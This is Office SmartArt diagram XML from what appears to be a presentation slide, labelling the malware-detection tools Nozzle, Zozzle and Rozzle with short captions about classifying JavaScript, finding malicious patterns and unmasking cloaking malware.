    <dgm:cxn modelId="{7F613112-9DC6-406F-9D83-6D146D0D9C22}" type="presParOf" srcId="{D62B9EF4-2EBE-48AA-93BD-359698940624}" destId="{170CD44F-31FA-458A-99A0-9DA364AC4E8D}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2011/layout/RadialPictureList"/>
    <dgm:cxn modelId="{AB34A394-C0C4-4F5A-AC68-7C00FB587EF3}" type="presParOf" srcId="{D62B9EF4-2EBE-48AA-93BD-359698940624}" destId="{F98C0AC3-421E-4976-8531-27C2CAAC5D6E}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2011/layout/RadialPictureList"/>
    <dgm:cxn modelId="{23C7C376-E237-447D-A9E1-927A85502A24}" type="presParOf" srcId="{D62B9EF4-2EBE-48AA-93BD-359698940624}" destId="{836B8372-1AC1-4C30-9C91-27561FA2BC32}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2011/layout/RadialPictureList"/>
    <dgm:cxn modelId="{6AFCCC6C-3E28-4E3C-925D-839D30164C3F}" type="presParOf" srcId="{D62B9EF4-2EBE-48AA-93BD-359698940624}" destId="{1A49931B-DD10-4453-9AAE-2E9B095ADB05}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2011/layout/RadialPictureList"/>
    <dgm:cxn modelId="{515DB116-AF48-4532-B830-BC9D3B5D30C6}" type="presParOf" srcId="{1A49931B-DD10-4453-9AAE-2E9B095ADB05}" destId="{ACA413BF-0915-4049-A5C9-7FD42C0186B3}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2011/layout/RadialPictureList"/>
    <dgm:cxn modelId="{DF8E0EE7-A6A4-4FDB-B289-DC249B857028}" type="presParOf" srcId="{D62B9EF4-2EBE-48AA-93BD-359698940624}" destId="{74586B4C-DC6C-42F1-8E4D-88C4E6336CBF}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2011/layout/RadialPictureList"/>
    <dgm:cxn modelId="{4EC5DCDC-B37F-4FFB-B36C-A67D368F94E5}" type="presParOf" srcId="{D62B9EF4-2EBE-48AA-93BD-359698940624}" destId="{47474F5A-E13F-4EA9-873E-C68EC610C1F8}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2011/layout/RadialPictureList"/>
    <dgm:cxn modelId="{94330C88-8AC9-4F1B-91E5-7D4D77748C41}" type="presParOf" srcId="{47474F5A-E13F-4EA9-873E-C68EC610C1F8}" destId="{69074874-D740-4421-B6B9-9D999C367698}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2011/layout/RadialPictureList"/>
    <dgm:cxn modelId="{D1DA11E6-84AE-4F29-8EEC-296846164FA1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CBA3949-A4A7-4783-AAC7-6B56479DFAD4}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr algn="ctr"/>
          <a:r>
            <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
            <a:t>Classify JavaScript code statically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/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr algn="ctr"/>
          <a:r>
            <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
            <a:t>Find malicious patterns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>
        <a:ln>
          <a:noFill/>
        </a:ln>
        <a:effectLst/>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="3600" dirty="0">
            <a:solidFill>
              <a:schemeClr val="bg1">
                <a:lumMod val="50000"/>
              </a:schemeClr>
            </a:solidFill>
          </a:endParaRPr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90309C7-1899-4CD1-AA74-A540BAC8566E}" type="pres">
      <dgm:prSet presAssocID="{BE3E69EE-DBEB-4A8A-8CDA-C96E2CF47CFE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DE43A99-7C6C-4AFE-A15E-723DD53E1CBA}" type="pres">
      <dgm:prSet presAssocID="{9CBA3949-A4A7-4783-AAC7-6B56479DFAD4}" presName="Accent" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="2"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{9EE55393-DFAB-43CB-91DC-24B58349D17D}" type="pres">
      <dgm:prSet presAssocID="{9CBA3949-A4A7-4783-AAC7-6B56479DFAD4}" presName="Image1" presStyleLbl="fgImgPlace1" presStyleIdx="0" presStyleCnt="2"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{1A5263A7-8AC9-41D6-9BBB-456B0B592F19}" type="pres">
      <dgm:prSet presAssocID="{9CBA3949-A4A7-4783-AAC7-6B56479DFAD4}" presName="Child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15DF6-830D-4AE9-93B0-B23C9B93DC10}" type="pres">
      <dgm:prSet presAssocID="{F85D88E0-5569-483C-B80D-52DADDD67C86}" presName="Image2" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{69074874-D740-4421-B6B9-9D999C367698}" type="pres">
      <dgm:prSet presAssocID="{F85D88E0-5569-483C-B80D-52DADDD67C86}" presName="Image" presStyleLbl="fgImgPlace1" presStyleIdx="1" presStyleCnt="2"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{8BB7EC6C-5DD7-4222-AC4E-791FD67CE7DD}" type="pres">
      <dgm:prSet presAssocID="{F85D88E0-5569-483C-B80D-52DADDD67C86}" presName="Child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BCB882-DDD3-4920-918D-EF443A7927D8}" type="presOf" srcId="{42CA8381-D83C-49DC-A535-FD3A5A280337}" destId="{D62B9EF4-2EBE-48AA-93BD-359698940624}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2011/layout/RadialPictureList"/>
    <dgm:cxn modelId="{70989BBE-6FA0-4DD4-96DC-DB24790D7294}" type="presOf" srcId="{F85D88E0-5569-483C-B80D-52DADDD67C86}" destId="{8BB7EC6C-5DD7-4222-AC4E-791FD67CE7DD}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2011/layout/RadialPictureList"/>
    <dgm:cxn modelId="{724C66DB-72B9-4D2F-8379-B5C2B0E3ACA6}" type="presOf" srcId="{BE3E69EE-DBEB-4A8A-8CDA-C96E2CF47CFE}" destId="{D90309C7-1899-4CD1-AA74-A540BAC8566E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2011/layout/RadialPictureList"/>
    <dgm:cxn modelId="{66510539-223B-43A8-BBD7-5A7460B974BE}" srcId="{BE3E69EE-DBEB-4A8A-8CDA-C96E2CF47CFE}" destId="{F85D88E0-5569-483C-B80D-52DADDD67C86}" srcOrd="1" destOrd="0" parTransId="{17C3F4A5-BF4E-4D83-B70D-B4035F1B932E}" sibTransId="{9B4F3F4F-2344-4DC5-AD50-6D29D9598234}"/>
    <dgm:cxn modelId="{CAE4E115-522F-4596-A5D7-25B0AE8DAC50}" type="presOf" srcId="{9CBA3949-A4A7-4783-AAC7-6B56479DFAD4}" destId="{1A5263A7-8AC9-41D6-9BBB-456B0B592F19}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2011/layout/RadialPictureList"/>
    <dgm:cxn modelId="{EA4E4D66-506E-490A-BF91-791CBD332AC8}" srcId="{BE3E69EE-DBEB-4A8A-8CDA-C96E2CF47CFE}" destId="{9CBA3949-A4A7-4783-AAC7-6B56479DFAD4}" srcOrd="0" destOrd="0" parTransId="{0D7E027F-477F-47C6-ACB2-38976E637203}" sibTransId="{E7F67361-B7B8-4C78-959C-9D8810C47A70}"/>
    <dgm:cxn modelId="{B1FFD44C-3621-4ED4-8856-C4BB9AB5A253}" srcId="{42CA8381-D83C-49DC-A535-FD3A5A280337}" destId="{BE3E69EE-DBEB-4A8A-8CDA-C96E2CF47CFE}" srcOrd="0" destOrd="0" parTransId="{1AEA54FF-D9A7-4E97-9159-E0DF0DEDADB4}" sibTransId="{912AD743-EC93-45A9-9163-A14A9AA5C912}"/>
    <dgm:cxn modelId="{A5941C66-D076-4006-AFA6-8494CE97BE44}" type="presParOf" srcId="{D62B9EF4-2EBE-48AA-93BD-359698940624}" destId="{D90309C7-1899-4CD1-AA74-A540BAC8566E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2011/layout/RadialPictureList"/>
    <dgm:cxn modelId="{42B913D1-38B4-4A56-8B56-AE84DD8FDE0D}" type="presParOf" srcId="{D62B9EF4-2EBE-48AA-93BD-359698940624}" destId="{0DE43A99-7C6C-4AFE-A15E-723DD53E1CBA}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2011/layout/RadialPictureList"/>
    <dgm:cxn modelId="{5E9B3155-D92C-4128-AA34-7C0335EF8517}" type="presParOf" srcId="{D62B9EF4-2EBE-48AA-93BD-359698940624}" destId="{9EE55393-DFAB-43CB-91DC-24B58349D17D}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2011/layout/RadialPictureList"/>
    <dgm:cxn modelId="{B0D2F9B4-1137-4DB3-857B-B5FAE629DC7C}" type="presParOf" srcId="{D62B9EF4-2EBE-48AA-93BD-359698940624}" destId="{1A5263A7-8AC9-41D6-9BBB-456B0B592F19}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2011/layout/RadialPictureList"/>
    <dgm:cxn modelId="{85610135-B974-4221-AEFB-821EC02D49F0}" type="presParOf" srcId="{D62B9EF4-2EBE-48AA-93BD-359698940624}" destId="{2EF15DF6-830D-4AE9-93B0-B23C9B93DC10}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2011/layout/RadialPictureList"/>
    <dgm:cxn modelId="{CFBB143D-2C9E-4094-B4D8-DD933FB8F250}" type="presParOf" srcId="{2EF15DF6-830D-4AE9-93B0-B23C9B93DC10}" destId="{69074874-D740-4421-B6B9-9D999C367698}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2011/layout/RadialPictureList"/>
    <dgm:cxn modelId="{54CACE08-53C9-4004-BE9F-54AC29CC01EC}" type="presParOf" srcId="{D62B9EF4-2EBE-48AA-93BD-359698940624}" destId="{8BB7EC6C-5DD7-4222-AC4E-791FD67CE7DD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3600" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t> Nozzle</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t>   </a:t>
          </a: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 custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr algn="ctr"/>
          <a:r>
            <a:rPr lang="en-US" sz="4800" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>   </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="5400" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>Zozzle</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="43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50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t>Rozzle</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US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/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{F98C0AC3-421E-4976-8531-27C2CAAC5D6E}" type="pres">
      <dgm:prSet presAssocID="{BE3E69EE-DBEB-4A8A-8CDA-C96E2CF47CFE}" presName="Image1" presStyleLbl="fgImgPlace1" presStyleIdx="0" presStyleCnt="3" custScaleX="71570" custScaleY="71570"/>
      <dgm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836B8372-1AC1-4C30-9C91-27561FA2BC32}" type="pres">
      <dgm:prSet presAssocID="{BE3E69EE-DBEB-4A8A-8CDA-C96E2CF47CFE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 custScaleX="121342" custScaleY="121343"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="tx2"/>
        </a:solidFill>
        <a:ln>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:lumMod val="50000"/>
            </a:schemeClr>
          </a:solidFill>
        </a:ln>
      </dgm:spPr>
    </dgm:pt>
    <dgm:pt modelId="{74586B4C-DC6C-42F1-8E4D-88C4E6336CBF}" type="pres">
      <dgm:prSet presAssocID="{9CBA3949-A4A7-4783-AAC7-6B56479DFAD4}" presName="Child2" presStyleLbl="revTx" presStyleIdx="1" presStyleCnt="3" custScaleX="148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 custScaleX="62261" custScaleY="62261"/>
      <dgm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16E1C02D-E7D5-45FC-B787-772B2C997025}" type="pres">
      <dgm:prSet presAssocID="{F85D88E0-5569-483C-B80D-52DADDD67C8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29782C25-4C99-4A92-A859-16B095916F5F}" type="presOf" srcId="{42CA8381-D83C-49DC-A535-FD3A5A280337}" destId="{D62B9EF4-2EBE-48AA-93BD-359698940624}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2011/layout/RadialPictureList"/>
    <dgm:cxn modelId="{675100C3-0140-4096-AC3E-4B443821DDB8}" type="presOf" srcId="{BE3E69EE-DBEB-4A8A-8CDA-C96E2CF47CFE}" destId="{836B8372-1AC1-4C30-9C91-27561FA2BC32}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2011/layout/RadialPictureList"/>
    <dgm:cxn modelId="{7A46F734-0B04-4C59-A5A9-63D0FB3782F9}" type="presOf" srcId="{9CBA3949-A4A7-4783-AAC7-6B56479DFAD4}" destId="{74586B4C-DC6C-42F1-8E4D-88C4E6336CBF}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2011/layout/RadialPictureList"/>
    <dgm:cxn modelId="{1C41A3D9-D190-4A65-AB82-14230AFDF38D}" type="presOf" srcId="{9BF7A25B-01D9-44DE-AAAA-07B6F5059E80}" destId="{EBE48C75-D016-4F08-9F51-B3D240ACF8EC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767E8AC1-B43F-4F57-8560-D4BFAD6C680A}" type="presOf" srcId="{F85D88E0-5569-483C-B80D-52DADDD67C86}" destId="{16E1C02D-E7D5-45FC-B787-772B2C997025}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2011/layout/RadialPictureList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39692C31-0551-4ACD-87A5-4AABAADF7D38}" type="presParOf" srcId="{D62B9EF4-2EBE-48AA-93BD-359698940624}" destId="{EBE48C75-D016-4F08-9F51-B3D240ACF8EC}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2011/layout/RadialPictureList"/>
    <dgm:cxn modelId="{1B9190FF-8B64-4F3A-90D4-F64C6FD0FD78}" type="presParOf" srcId="{D62B9EF4-2EBE-48AA-93BD-359698940624}" destId="{170CD44F-31FA-458A-99A0-9DA364AC4E8D}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2011/layout/RadialPictureList"/>
    <dgm:cxn modelId="{906C64A9-6F37-463F-A495-7FFF8DE2441F}" type="presParOf" srcId="{D62B9EF4-2EBE-48AA-93BD-359698940624}" destId="{F98C0AC3-421E-4976-8531-27C2CAAC5D6E}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2011/layout/RadialPictureList"/>
    <dgm:cxn modelId="{F21F7D6B-330D-4E14-AD2B-743ED0036A21}" type="presParOf" srcId="{D62B9EF4-2EBE-48AA-93BD-359698940624}" destId="{836B8372-1AC1-4C30-9C91-27561FA2BC32}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2011/layout/RadialPictureList"/>
    <dgm:cxn modelId="{CD0514ED-D08C-44E1-957F-08F3B6172E9A}" type="presParOf" srcId="{D62B9EF4-2EBE-48AA-93BD-359698940624}" destId="{1A49931B-DD10-4453-9AAE-2E9B095ADB05}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2011/layout/RadialPictureList"/>
    <dgm:cxn modelId="{AD0843A9-9620-4E15-99E2-4C9E469E3B37}" type="presParOf" srcId="{1A49931B-DD10-4453-9AAE-2E9B095ADB05}" destId="{ACA413BF-0915-4049-A5C9-7FD42C0186B3}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2011/layout/RadialPictureList"/>
    <dgm:cxn modelId="{427AE066-AB91-4EEE-A892-4A0D49CBBB5E}" type="presParOf" srcId="{D62B9EF4-2EBE-48AA-93BD-359698940624}" destId="{74586B4C-DC6C-42F1-8E4D-88C4E6336CBF}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2011/layout/RadialPictureList"/>
    <dgm:cxn modelId="{16E0CFB4-C203-4B0A-9DE0-7D2CF6F8F18B}" type="presParOf" srcId="{D62B9EF4-2EBE-48AA-93BD-359698940624}" destId="{47474F5A-E13F-4EA9-873E-C68EC610C1F8}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2011/layout/RadialPictureList"/>
    <dgm:cxn modelId="{4BA7DB68-1332-4786-8F36-15DD665DE573}" type="presParOf" srcId="{47474F5A-E13F-4EA9-873E-C68EC610C1F8}" destId="{69074874-D740-4421-B6B9-9D999C367698}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2011/layout/RadialPictureList"/>
    <dgm:cxn modelId="{E1F15972-03EE-49E2-A819-88BAC9C6FFD9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CBA3949-A4A7-4783-AAC7-6B56479DFAD4}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr algn="ctr"/>
          <a:r>
            <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
            <a:t>Detect cloaking malware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/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr algn="ctr"/>
          <a:r>
            <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
            <a:t>Unmask it to detect more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>
        <a:ln>
          <a:noFill/>
        </a:ln>
        <a:effectLst/>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="3600" dirty="0">
            <a:solidFill>
              <a:schemeClr val="bg1">
                <a:lumMod val="50000"/>
              </a:schemeClr>
            </a:solidFill>
          </a:endParaRPr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90309C7-1899-4CD1-AA74-A540BAC8566E}" type="pres">
      <dgm:prSet presAssocID="{BE3E69EE-DBEB-4A8A-8CDA-C96E2CF47CFE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DE43A99-7C6C-4AFE-A15E-723DD53E1CBA}" type="pres">
      <dgm:prSet presAssocID="{9CBA3949-A4A7-4783-AAC7-6B56479DFAD4}" presName="Accent" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="2"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{9EE55393-DFAB-43CB-91DC-24B58349D17D}" type="pres">
      <dgm:prSet presAssocID="{9CBA3949-A4A7-4783-AAC7-6B56479DFAD4}" presName="Image1" presStyleLbl="fgImgPlace1" presStyleIdx="0" presStyleCnt="2"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{1A5263A7-8AC9-41D6-9BBB-456B0B592F19}" type="pres">
      <dgm:prSet presAssocID="{9CBA3949-A4A7-4783-AAC7-6B56479DFAD4}" presName="Child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15DF6-830D-4AE9-93B0-B23C9B93DC10}" type="pres">
      <dgm:prSet presAssocID="{F85D88E0-5569-483C-B80D-52DADDD67C86}" presName="Image2" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{69074874-D740-4421-B6B9-9D999C367698}" type="pres">
      <dgm:prSet presAssocID="{F85D88E0-5569-483C-B80D-52DADDD67C86}" presName="Image" presStyleLbl="fgImgPlace1" presStyleIdx="1" presStyleCnt="2"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{8BB7EC6C-5DD7-4222-AC4E-791FD67CE7DD}" type="pres">
      <dgm:prSet presAssocID="{F85D88E0-5569-483C-B80D-52DADDD67C86}" presName="Child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F576A8-65B9-4699-BB51-B6781DA04789}" type="presOf" srcId="{42CA8381-D83C-49DC-A535-FD3A5A280337}" destId="{D62B9EF4-2EBE-48AA-93BD-359698940624}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2011/layout/RadialPictureList"/>
    <dgm:cxn modelId="{5655481A-468C-4F24-A5D7-A55B0F8809D4}" type="presOf" srcId="{F85D88E0-5569-483C-B80D-52DADDD67C86}" destId="{8BB7EC6C-5DD7-4222-AC4E-791FD67CE7DD}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2011/layout/RadialPictureList"/>
    <dgm:cxn modelId="{DD2FF771-4EDE-406B-86A2-3E7E7C6651C3}" type="presOf" srcId="{BE3E69EE-DBEB-4A8A-8CDA-C96E2CF47CFE}" destId="{D90309C7-1899-4CD1-AA74-A540BAC8566E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2011/layout/RadialPictureList"/>
    <dgm:cxn modelId="{66510539-223B-43A8-BBD7-5A7460B974BE}" srcId="{BE3E69EE-DBEB-4A8A-8CDA-C96E2CF47CFE}" destId="{F85D88E0-5569-483C-B80D-52DADDD67C86}" srcOrd="1" destOrd="0" parTransId="{17C3F4A5-BF4E-4D83-B70D-B4035F1B932E}" sibTransId="{9B4F3F4F-2344-4DC5-AD50-6D29D9598234}"/>
    <dgm:cxn modelId="{355E3BB2-D354-4E2F-8417-AB9DB444ECB0}" type="presOf" srcId="{9CBA3949-A4A7-4783-AAC7-6B56479DFAD4}" destId="{1A5263A7-8AC9-41D6-9BBB-456B0B592F19}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2011/layout/RadialPictureList"/>
    <dgm:cxn modelId="{EA4E4D66-506E-490A-BF91-791CBD332AC8}" srcId="{BE3E69EE-DBEB-4A8A-8CDA-C96E2CF47CFE}" destId="{9CBA3949-A4A7-4783-AAC7-6B56479DFAD4}" srcOrd="0" destOrd="0" parTransId="{0D7E027F-477F-47C6-ACB2-38976E637203}" sibTransId="{E7F67361-B7B8-4C78-959C-9D8810C47A70}"/>
    <dgm:cxn modelId="{B1FFD44C-3621-4ED4-8856-C4BB9AB5A253}" srcId="{42CA8381-D83C-49DC-A535-FD3A5A280337}" destId="{BE3E69EE-DBEB-4A8A-8CDA-C96E2CF47CFE}" srcOrd="0" destOrd="0" parTransId="{1AEA54FF-D9A7-4E97-9159-E0DF0DEDADB4}" sibTransId="{912AD743-EC93-45A9-9163-A14A9AA5C912}"/>
    <dgm:cxn modelId="{F2AFCE80-1B27-4E39-B650-A19A8BB199B0}" type="presParOf" srcId="{D62B9EF4-2EBE-48AA-93BD-359698940624}" destId="{D90309C7-1899-4CD1-AA74-A540BAC8566E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2011/layout/RadialPictureList"/>
    <dgm:cxn modelId="{B9D9745E-45D3-45AE-8503-C42969436C1A}" type="presParOf" srcId="{D62B9EF4-2EBE-48AA-93BD-359698940624}" destId="{0DE43A99-7C6C-4AFE-A15E-723DD53E1CBA}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2011/layout/RadialPictureList"/>
    <dgm:cxn modelId="{AD6B0279-FC08-4BA0-9934-60255BF61522}" type="presParOf" srcId="{D62B9EF4-2EBE-48AA-93BD-359698940624}" destId="{9EE55393-DFAB-43CB-91DC-24B58349D17D}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2011/layout/RadialPictureList"/>
    <dgm:cxn modelId="{253A3AA5-9AE0-4A2C-9A7B-7F5249EB0195}" type="presParOf" srcId="{D62B9EF4-2EBE-48AA-93BD-359698940624}" destId="{1A5263A7-8AC9-41D6-9BBB-456B0B592F19}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2011/layout/RadialPictureList"/>
    <dgm:cxn modelId="{934C551D-8C4C-4A20-BE44-1A4F796DAE69}" type="presParOf" srcId="{D62B9EF4-2EBE-48AA-93BD-359698940624}" destId="{2EF15DF6-830D-4AE9-93B0-B23C9B93DC10}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2011/layout/RadialPictureList"/>
    <dgm:cxn modelId="{B81E28BD-E240-4FB6-9D3D-B40173A6830D}" type="presParOf" srcId="{2EF15DF6-830D-4AE9-93B0-B23C9B93DC10}" destId="{69074874-D740-4421-B6B9-9D999C367698}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2011/layout/RadialPictureList"/>
    <dgm:cxn modelId="{80062D85-E218-414C-8D08-FDE63F9580B5}" type="presParOf" srcId="{D62B9EF4-2EBE-48AA-93BD-359698940624}" destId="{8BB7EC6C-5DD7-4222-AC4E-791FD67CE7DD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CA8381-D83C-49DC-A535-FD3A5A280337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BF7A25B-01D9-44DE-AAAA-07B6F5059E8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8B882BC-ED9D-47E4-8D8F-3EA7843A2B4C}" type="parTrans" cxnId="{481F58EA-85B8-4608-8BA8-027EA0ADCF80}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{20716AAD-8A1A-40DE-8DD4-C9C0C0B4E5AB}" type="sibTrans" cxnId="{481F58EA-85B8-4608-8BA8-027EA0ADCF80}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BE3E69EE-DBEB-4A8A-8CDA-C96E2CF47CFE}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="3600" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t> N</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="4000" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t>ozzle</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t>   </a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1AEA54FF-D9A7-4E97-9159-E0DF0DEDADB4}" type="parTrans" cxnId="{B1FFD44C-3621-4ED4-8856-C4BB9AB5A253}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{912AD743-EC93-45A9-9163-A14A9AA5C912}" type="sibTrans" cxnId="{B1FFD44C-3621-4ED4-8856-C4BB9AB5A253}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9CBA3949-A4A7-4783-AAC7-6B56479DFAD4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50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t>Zozzle</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US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0D7E027F-477F-47C6-ACB2-38976E637203}" type="parTrans" cxnId="{EA4E4D66-506E-490A-BF91-791CBD332AC8}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E7F67361-B7B8-4C78-959C-9D8810C47A70}" type="sibTrans" cxnId="{EA4E4D66-506E-490A-BF91-791CBD332AC8}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F85D88E0-5569-483C-B80D-52DADDD67C86}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr algn="ctr"/>
          <a:r>
            <a:rPr lang="en-US" sz="5400" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>  Rozzle</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="43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17C3F4A5-BF4E-4D83-B70D-B4035F1B932E}" type="parTrans" cxnId="{66510539-223B-43A8-BBD7-5A7460B974BE}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9B4F3F4F-2344-4DC5-AD50-6D29D9598234}" type="sibTrans" cxnId="{66510539-223B-43A8-BBD7-5A7460B974BE}">
      <dgm:prSet/>
      <dgm:spPr/>
